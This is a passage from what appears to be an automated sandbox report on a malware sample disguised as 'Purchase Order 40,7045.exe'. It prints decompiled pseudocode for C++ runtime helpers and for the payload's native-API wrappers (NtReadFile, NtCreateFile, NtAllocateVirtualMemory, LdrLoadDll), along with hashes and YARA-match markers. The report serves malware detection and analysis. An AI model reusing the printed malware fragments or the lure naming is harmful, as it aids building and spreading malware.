0x00863e75
0x00863e51
0x00863e58
0x00863e5f
0x00863ebc
0x00863ec2
0x00863e61
0x00863e61
0x00863e65
0x00863e91
0x00863e67
0x00863e67
0x00863e67
0x00863e96
0x00863ea2
0x00863ea5
0x00863eb8
0x00000000
0x00863ea7
0x00863ea9
0x00863eb3
0x00863eb3
0x00863ea5
0x00863e5f
0x00863dde
0x00863dde
0x00863de4
0x00863dea
0x00863de6
0x00863de6
0x00863de6
0x00863dee
0x00000000
0x00863df0
0x00863df3
0x00863df9
0x00863df5
0x00863df5
0x00863df5
0x00863e02
0x00000000
0x00863e04
0x00863e07
0x00863e34
0x00863e09
0x00863e1d
0x00863e1d
0x00863e07
0x00863e02
0x00863dee

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00863E45
_memmove.LIBCMT ref: 00863E96

Part of subcall function 00865AE0: std::_Xinvalid_argument.LIBCPMT ref: 00865AFA

Strings

string too long, xrefs: 00863E40

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 8102459881b2ea9d3572391b687347c7657f66c4838f29bc6069c6e47aec8fa9
Instruction ID: 6f4ab368ea5a2b8a0922e0c46ff77fdfb8f71d96538463f1f125bfe1772bcc87
Opcode Fuzzy Hash: 8102459881b2ea9d3572391b687347c7657f66c4838f29bc6069c6e47aec8fa9
Instruction Fuzzy Hash: D631D8323006549BD7359E9CE88096AF7EDFB95760B61092FF582C7A81C772DD4083B1

Uniqueness

Uniqueness Score: -1.00%

Function 00866D80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00866D80(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr _t16;
				intOrPtr* _t19;
				intOrPtr _t24;
				intOrPtr _t27;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t34;

				_t34 = __ecx;
				_t10 =  *((intOrPtr*)(__ecx + 0x10));
				_t24 = _a4;
				if(_t10 < _t24) {
					_t10 = E008695E5("invalid string position");
				}
				_t31 = _a8;
				_t11 = _t10 - _t24;
				if(_t11 < _t31) {
					_t31 = _t11;
				}
				if(_t31 == 0) {
					L14:
					return _t34;
				} else {
					_t27 =  *((intOrPtr*)(_t34 + 0x14));
					if(_t27 < 0x10) {
						_t19 = _t34;
					} else {
						_t19 =  *_t34;
					}
					if(_t27 < 0x10) {
						_t28 = _t34;
					} else {
						_t28 =  *_t34;
					}
					E0086A290(_t28 + _t24, _t19 + _t24 + _t31, _t11 - _t31);
					_t16 =  *((intOrPtr*)(_t34 + 0x10)) - _t31;
					 *((intOrPtr*)(_t34 + 0x10)) = _t16;
					if( *((intOrPtr*)(_t34 + 0x14)) < 0x10) {
						 *((char*)(_t34 + _t16)) = 0;
						goto L14;
					} else {
						 *((char*)( *_t34 + _t16)) = 0;
						return _t34;
					}
				}
			}

0x00866d84
0x00866d86
0x00866d89
0x00866d8f
0x00866d96
0x00866d96
0x00866d9b
0x00866d9e
0x00866da2
0x00866da4
0x00866da4
0x00866da8
0x00866dfa
0x00866dff
0x00866daa
0x00866daa
0x00866db1
0x00866db7
0x00866db3
0x00866db3
0x00866db3
0x00866dbc
0x00866dc2
0x00866dbe
0x00866dbe
0x00866dbe
0x00866dcf
0x00866dda
0x00866de0
0x00866de4
0x00866df6
0x00000000
0x00866de6
0x00866de8
0x00866df1
0x00866df1
0x00866de4

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00866D96

Part of subcall function 008695E5: std::exception::exception.LIBCMT ref: 008695FA
Part of subcall function 008695E5: __CxxThrowException@8.LIBCMT ref: 0086960F
Part of subcall function 008695E5: std::exception::exception.LIBCMT ref: 00869620

_memmove.LIBCMT ref: 00866DCF

Strings

invalid string position, xrefs: 00866D91

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: f153e6e9e21fb3670d24f7124f4aee8c6a6870317cb67f1a6b458d04d8192eb8
Instruction ID: cd67d18f62aef8379addda5dac25bf43c54c03f48eeeb99ede870da11ccbd5ed
Opcode Fuzzy Hash: f153e6e9e21fb3670d24f7124f4aee8c6a6870317cb67f1a6b458d04d8192eb8
Instruction Fuzzy Hash: AE01F9713003888BD725CEACEC9096AF7EAFBD1754726492DE081CB745E6B2EC5187A0

Uniqueness

Uniqueness Score: -1.00%

Function 00863D40, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00863D40(signed int __eax, intOrPtr* __esi) {
				intOrPtr _t15;
				intOrPtr* _t16;
				char* _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr* _t37;

				_t37 = __esi;
				_t27 =  *((intOrPtr*)(__esi + 0x10));
				if((__eax | 0xffffffff) - _t27 <= 1) {
					E00869598("string too long");
				}
				_t32 = _t27 + 1;
				if(_t32 > 0xfffffffe) {
					E00869598("string too long");
				}
				_t15 =  *((intOrPtr*)(_t37 + 0x14));
				if(_t15 >= _t32) {
					if(_t32 != 0) {
						goto L6;
					} else {
						 *((intOrPtr*)(_t37 + 0x10)) = _t32;
						if(_t15 < 0x10) {
							_t21 = _t37;
							 *_t21 = 0;
							return _t21;
						} else {
							 *((char*)( *_t37)) = 0;
							return _t37;
						}
					}
				} else {
					E00866E50(_t37, _t32, _t27);
					if(_t32 == 0) {
						L16:
						return _t37;
					} else {
						L6:
						_t28 =  *((intOrPtr*)(_t37 + 0x10));
						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
							_t16 = _t37;
						} else {
							_t16 =  *_t37;
						}
						 *((char*)(_t16 + _t28)) = 0;
						 *((intOrPtr*)(_t37 + 0x10)) = _t32;
						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
							 *((char*)(_t37 + _t32)) = 0;
							goto L16;
						} else {
							 *((char*)( *_t37 + _t32)) = 0;
							return _t37;
						}
					}
				}
			}

0x00863d40
0x00863d40
0x00863d4b
0x00863d52
0x00863d52
0x00863d58
0x00863d5e
0x00863d65
0x00863d65
0x00863d6a
0x00863d6f
0x00863d91
0x00000000
0x00863d93
0x00863d93
0x00863d99
0x00863da4
0x00863da6
0x00863daa
0x00863d9b
0x00863d9d
0x00863da3
0x00863da3
0x00863d99
0x00863d71
0x00863d75
0x00863d7c
0x00863dc9
0x00863dcc
0x00863d7e
0x00863d7e
0x00863d7e
0x00863d89
0x00863dab
0x00863d8b
0x00863d8b
0x00863d8b
0x00863dad
0x00863db1
0x00863db7
0x00863dc5
0x00000000
0x00863db9
0x00863dbb
0x00863dc2
0x00863dc2
0x00863db7
0x00863d7c

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00863D52

Part of subcall function 00869598: std::exception::exception.LIBCMT ref: 008695AD
Part of subcall function 00869598: __CxxThrowException@8.LIBCMT ref: 008695C2
Part of subcall function 00869598: std::exception::exception.LIBCMT ref: 008695D3

std::_Xinvalid_argument.LIBCPMT ref: 00863D65

Strings

string too long, xrefs: 00863D4D, 00863D60

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: 87493593a1e033b0008ecf65af6091d29bb5510a1539decf515398a7c41281bd
Instruction ID: 7ef85aeffa16e096fca54f3d439d1efe78d277a443c9162eb4a969892436bdc6
Opcode Fuzzy Hash: 87493593a1e033b0008ecf65af6091d29bb5510a1539decf515398a7c41281bd
Instruction Fuzzy Hash: FA118E303147408BD7328B2CE800719B7E5FBD5B10F260B5DE0A2CB795CB71DA418791

Uniqueness

Uniqueness Score: -1.00%

Function 00867CE0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00867CE0(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* _t34;
				void* _t41;
				intOrPtr* _t42;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t48;

				_push(0xffffffff);
				_push(E0087E110);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_push(_t41);
				_v20 = _t47;
				_t45 = _a4;
				_t42 = E0086A96A(_t41, _t45, _t48);
				 *((intOrPtr*)(_t45 + 8)) = 0;
				 *((intOrPtr*)(_t45 + 0x10)) = 0;
				 *((intOrPtr*)(_t45 + 0x14)) = 0;
				_v8 = 0;
				E0086807E();
				 *((intOrPtr*)(_t45 + 8)) = E00867FA0(0x8825b1);
				E0086807E();
				 *((intOrPtr*)(_t45 + 0x10)) = E00867FA0("false");
				E0086807E();
				 *((intOrPtr*)(_t45 + 0x14)) = E00867FA0("true");
				_v8 = 0xffffffff;
				E0086807E();
				 *((char*)(_t45 + 0xc)) =  *((intOrPtr*)( *_t42));
				E0086807E();
				 *((char*)(_t45 + 0xd)) =  *((intOrPtr*)( *((intOrPtr*)(_t42 + 4))));
				E0086807E();
				 *((char*)(_t45 + 0xc)) = 0x2e;
				_t34 = E0086807E();
				 *((char*)(_t45 + 0xd)) = 0x2c;
				 *[fs:0x0] = _v16;
				return _t34;
			}

0x00867ce3
0x00867ce5
0x00867cf0
0x00867cf1
0x00867cfb
0x00867cfc
0x00867cff
0x00867d07
0x00867d0b
0x00867d0e
0x00867d11
0x00867d14
0x00867d17
0x00867d26
0x00867d29
0x00867d38
0x00867d3b
0x00867d4a
0x00867d4d
0x00867d54
0x00867d5d
0x00867d60
0x00867d6a
0x00867d6d
0x00867d72
0x00867d76
0x00867d7b
0x00867d82
0x00867d8f

APIs

_localeconv.LIBCMT ref: 00867D02

Part of subcall function 0086A96A: __getptd.LIBCMT ref: 0086A96A

Part of subcall function 0086807E: ____lc_handle_func.LIBCMT ref: 00868081
Part of subcall function 0086807E: ____lc_codepage_func.LIBCMT ref: 00868089

Strings

false, xrefs: 00867D2E
true, xrefs: 00867D40

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: ____lc_codepage_func____lc_handle_func__getptd_localeconv
String ID: false$true
API String ID: 679402580-2658103896
Opcode ID: c98fb70e3d938af97582840a7496bd6c69a243bcb0f0571a290cb0a07a5f7946
Instruction ID: f73fa80ca757be1e9f24fd98424c6845b8260a2f1079ae8d4094ed4f8c812a28
Opcode Fuzzy Hash: c98fb70e3d938af97582840a7496bd6c69a243bcb0f0571a290cb0a07a5f7946
Instruction Fuzzy Hash: 5D118E70805B40DFC320EFBC840164ABBE0FF15B50F118A69E1A9C7755DB75A4088BA3

Uniqueness

Uniqueness Score: -1.00%

Function 0086E073, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0086E073(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t28 = __esi;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E0086BDEF(__edx, __edi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E00870C52(__ebx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E00870C52(__ebx, __edi, __eflags);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E0086BDC8(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E0086DDFA(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}

0x0086e073
0x0086e076
0x0086e07c
0x0086e08a
0x0086e090
0x0086e098
0x0086e0a4
0x0086e0ac
0x0086e0b4
0x0086e0c8
0x0086e0ca
0x0086e0ce
0x0086e0d3
0x0086e0d9
0x0086e0db
0x0086e0dd
0x0086e0e0
0x00000000
0x0086e0e7
0x0086e0db
0x0086e0ce
0x0086e0c8
0x0086e0b4
0x0086e0e8

APIs

Part of subcall function 0086BDEF: __getptd.LIBCMT ref: 0086BDF5
Part of subcall function 0086BDEF: __getptd.LIBCMT ref: 0086BE05

__getptd.LIBCMT ref: 0086E082

Part of subcall function 00870C52: __getptd_noexit.LIBCMT ref: 00870C55
Part of subcall function 00870C52: __amsg_exit.LIBCMT ref: 00870C62

__getptd.LIBCMT ref: 0086E090

Strings

csm, xrefs: 0086E09E

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: b8b45d335b483312cb5894480772b9f75ece092ec354287bccf4c685eb7e586b
Instruction ID: aeab170b9c06becc363a7c071dce5c0c9c04de1dc6ef6382e382fdcdd1d882be
Opcode Fuzzy Hash: b8b45d335b483312cb5894480772b9f75ece092ec354287bccf4c685eb7e586b
Instruction Fuzzy Hash: 0B014B38800B059BDF349F28E440AACB7B5FF20311F6A852EE085DA291CB718985CB23

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Purchase Order 40,7045.exe PID: 6932 Parent PID: 6916 Purchase Order 40,7045.exeCOMMON

Executed Functions

Function 00417C4C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(B7A,5EB6D251,FFFFFFFF,00413401,?,?,B7A,?,00413401,FFFFFFFF,5EB6D251,00413742,?,00000000), ref: 00417C95

Strings

B7A, xrefs: 00417C72, 00417C80
B7A, xrefs: 00417C8D, 00417C94

Memory Dump Source

Source File: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B7A$B7A
API String ID: 2738559852-4286991671
Opcode ID: a4c96e6fff6b813746d68099e86f7705dc423357b60c7f8202f5c84675e3ca42
Instruction ID: a0d3cf1b970ca4c606686759a31231282fdb88ea223be133041269946715ec58
Opcode Fuzzy Hash: a4c96e6fff6b813746d68099e86f7705dc423357b60c7f8202f5c84675e3ca42
Instruction Fuzzy Hash: B0F0F9B6210108ABCB04DF89DC81EEB77AAAF8C714F158248BE1D97241C634E8158BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00417C50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00417C50(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004187A0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413742
				_t12 =  &_a8; // 0x413742
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00417c53
0x00417c5f
0x00417c67
0x00417c72
0x00417c8d
0x00417c95
0x00417c99

APIs

NtReadFile.NTDLL(B7A,5EB6D251,FFFFFFFF,00413401,?,?,B7A,?,00413401,FFFFFFFF,5EB6D251,00413742,?,00000000), ref: 00417C95

Strings

B7A, xrefs: 00417C72, 00417C80
B7A, xrefs: 00417C8D, 00417C94

Memory Dump Source

Source File: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B7A$B7A
API String ID: 2738559852-4286991671
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: fc5ad5632067f05b263ccb687f6d3dc243eec14252959ded3e13faba14aac604
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: A6F0B7B6210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1D97241DA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409900, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409900(void* __ebx, void* __ecx, void* __edx, void* _a4) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t31;
				void* _t32;
				void* _t33;
				void* _t34;

				 *((intOrPtr*)(__ebx - 0x72aef3b3)) =  *((intOrPtr*)(__ebx - 0x72aef3b3)) + __ecx;
				asm("clc");
				_v8 =  &_v536;
				_t15 = E0041A500(__edx, 0x104, _t31);
				_t33 = _t32 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041A920(__eflags, _v8);
					_t34 = _t33 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041ABA0( &_v12, 0);
						_t34 = _t34 + 8;
					}
					_t18 = E00418CE0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409908
0x0040990f
0x0040991c
0x0040991f
0x00409924
0x00409929
0x00409933
0x00409938
0x0040993b
0x0040993d
0x00409945
0x0040994a
0x0040994a
0x00409951
0x00409959
0x0040995c
0x0040995e
0x00409972
0x00000000
0x00409974
0x0040997a
0x0040992e
0x0040992e
0x0040992e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409972

Memory Dump Source

Source File: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 37f4746ef459d9f07f06715d19472fa1fcea844b9e4b44dfac876fc9659aa77f
Instruction ID: 3e1a9c836465f0cd9433f245acf6ec4b9b71b65f2e46e3002b83b2b59f828c46
Opcode Fuzzy Hash: 37f4746ef459d9f07f06715d19472fa1fcea844b9e4b44dfac876fc9659aa77f
Instruction Fuzzy Hash: 5C0112B5D0010DB7DF10DAE5DC42FDEB7799B54318F0041AAA908A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 00417BA0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417BA0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004187A0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00417baf
0x00417bb7
0x00417bed
0x00417bf1

APIs

NtCreateFile.NTDLL(00000060,004088D3,?,00413587,004088D3,FFFFFFFF,?,?,FFFFFFFF,004088D3,00413587,?,004088D3,00000060,00000000,00000000), ref: 00417BED

Memory Dump Source

Source File: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 4afee6fb9e531a923c37445cfbca9961fe51888352856234bfa29487f9728496
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 93F0B2B6210208ABCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00417D80, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417D80(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004187A0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x00417d8f
0x00417d97
0x00417db9
0x00417dbd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418974,?,00000000,?,00003000,00000040,00000000,00000000,004088D3), ref: 00417DB9

Memory Dump Source

Source File: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 32094056e276ca4c351f563d3a1a8b286601cfb6b388fbac89c968cca0640338
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 23F015B6210208ABCB14DF89CC81EEB77ADAF88754F158549BE1897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00417CCA, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00417CCA(void* __eax, intOrPtr _a4, void* _a8) {
				long _t10;
				void* _t13;

				asm("out 0x62, al");
				_t7 = _a4;
				_t2 = _t7 + 0x10; // 0x300
				_t3 = _t7 + 0xc50; // 0x409523
				E004187A0(_t13, _a4, _t3,  *_t2, 0, 0x2c);
				_t10 = NtClose(_a8); // executed
				return _t10;
			}

0x00417cca
0x00417cd3
0x00417cd6
0x00417cdf
0x00417ce7
0x00417cf5
0x00417cf9

APIs

NtClose.NTDLL(00413720,?,?,00413720,004088D3,FFFFFFFF), ref: 00417CF5

Memory Dump Source

Source File: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 4dee57b317ebfe0f17001f1b3ef6753f6ac6057a1ec74bb3bf5305d24e139ee7
Instruction ID: c1654642e2f967172a1c53268c804fbf90d71c03da804563078781cd8180cfec
Opcode Fuzzy Hash: 4dee57b317ebfe0f17001f1b3ef6753f6ac6057a1ec74bb3bf5305d24e139ee7
Instruction Fuzzy Hash: E6E0C236200200BBD710EBD4CC45FD777A8EF44B10F144859BE1C9B282C530E6008BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00417CD0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417CD0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409523
				E004187A0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00417cd3
0x00417cd6
0x00417cdf
0x00417ce7
0x00417cf5
0x00417cf9

APIs

NtClose.NTDLL(00413720,?,?,00413720,004088D3,FFFFFFFF), ref: 00417CF5

Memory Dump Source

Source File: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: ae2cc5cd469da51146004d318edbe4db161d7590eeb0e760de4222944ae99cbc
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 91D01275200214ABD710EB99CC45ED7775DEF44750F154459BA1C5B242C530F50086E0

Uniqueness

Uniqueness Score: -1.00%

Function 01239910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0123991A

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f58b47be8d36a9ed2f36d87164e3b8e72d636e65d95e8ce84a3f88d5c3aead36
Instruction ID: 5b6c54bb1772f9975fb541abd3999d8d8a63a40011e42b8f4b0489eaebc381ea
Opcode Fuzzy Hash: f58b47be8d36a9ed2f36d87164e3b8e72d636e65d95e8ce84a3f88d5c3aead36
Instruction Fuzzy Hash: DB9002B131100803D14471A984047460005A7E0341F51C011A5054594EC6998DD577A9

Uniqueness

Uniqueness Score: -1.00%

Function 012399A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012399AA

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: df6a441445c346f8cdc3d4a0d7058dcd7ddebf31713af0c867fc4f817917b00d
Instruction ID: 590a0d49db023b12b52b4a88a2e8037745b104cd0396b7c9587839e6c61ab59b
Opcode Fuzzy Hash: df6a441445c346f8cdc3d4a0d7058dcd7ddebf31713af0c867fc4f817917b00d
Instruction Fuzzy Hash: 4D9002A135100843D10461A98414B060005E7F1341F51C015E1054594DC659CC52726A

Uniqueness

Uniqueness Score: -1.00%

Function 01239860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0123986A

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3ff0e20e0adbb5f39a7bc97fd776b426a0ed37696bf17f3008e66aa6249d3a78
Instruction ID: 95fb975a627a982661c7adf77744ea9d24e59590ccdbdd124592aad0929879ad
Opcode Fuzzy Hash: 3ff0e20e0adbb5f39a7bc97fd776b426a0ed37696bf17f3008e66aa6249d3a78
Instruction Fuzzy Hash: 7A90027131100813D11561A985047070009A7E0281F91C412A0414598DD6968952B265

Uniqueness

Uniqueness Score: -1.00%

Function 01239840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

